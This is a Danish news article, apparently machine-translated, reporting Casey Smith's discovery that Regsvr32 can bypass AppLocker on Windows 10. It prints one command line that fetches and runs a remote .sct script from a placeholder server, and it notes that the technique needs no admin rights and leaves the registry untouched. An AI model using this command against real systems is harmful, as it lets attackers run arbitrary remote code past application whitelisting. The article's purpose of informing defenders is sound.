En forsker fra Colorado, der går under navnet, Casey Smith, har fundet ud af, at Regsvr32 kan bruges til at omgå AppLocker på Windows 10, og dette er et stort problem for computerbrugere, især dem i erhvervsmiljøet.

AppLocker blev først introduceret i Windows 7 og Windows Server 2008 R2. Det er designet til at give administratorer mulighed for at specificere, hvilken gruppe eller brugere der kan drage fordel af nogle eller alle applikationer baseret på filernes unikke identitet. Hvis du er en person, der har en tendens til at bruge AppLocker, bør det være almindelig viden, at det kan bruges til at oprette bestemte regler for at give applikationer mulighed for at køre eller stoppe dem i deres spor.

For dem, der måske ikke er opmærksomme, kan Regvr32 bruges til at registrere og afregistrere DLL'er. Dette er ikke et enkelt-klik-værktøj, da det er et kommandolinjeværktøj, så kun avancerede computerbrugere bør søge at drage fordel af, hvad det har at tilbyde.

Vi forstår, at det ved at bruge denne teknik ikke ændrer computersystemets registreringsdatabase, hvilket gør det vanskeligt for administratorer at vide, om der er foretaget ændringer.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

”Det fantastiske her er, at regsvr32 allerede er proxybevidst, bruger TLS, følger omdirigeringer osv.… Og… Du gættede en underskrevet, standard MS binær. Så alt hvad du skal gøre er at være vært for din.sct-fil på et sted, du kontrollerer, ”skrev Smith.

Ovenstående teknik kræver ikke administrative privilegier, og den ændrer ikke registreringsdatabasen. Desuden kan scripterne kaldes over både HTTP eller HTTPS. I øjeblikket har Microsoft ikke frigivet en patch til dette lille problem, så den eneste mulighed på dette tidspunkt er at blokere Regsvr32 via Windows Firewall.

Interessant nok har softwaregiganten endnu ikke svaret om dette sikkerhedsproblem, som dens operativsystem står overfor. Nu når det er ude i det fri, forventer vi at høre noget fra virksomheden sammen med samtaler om en fremtidig opdatering.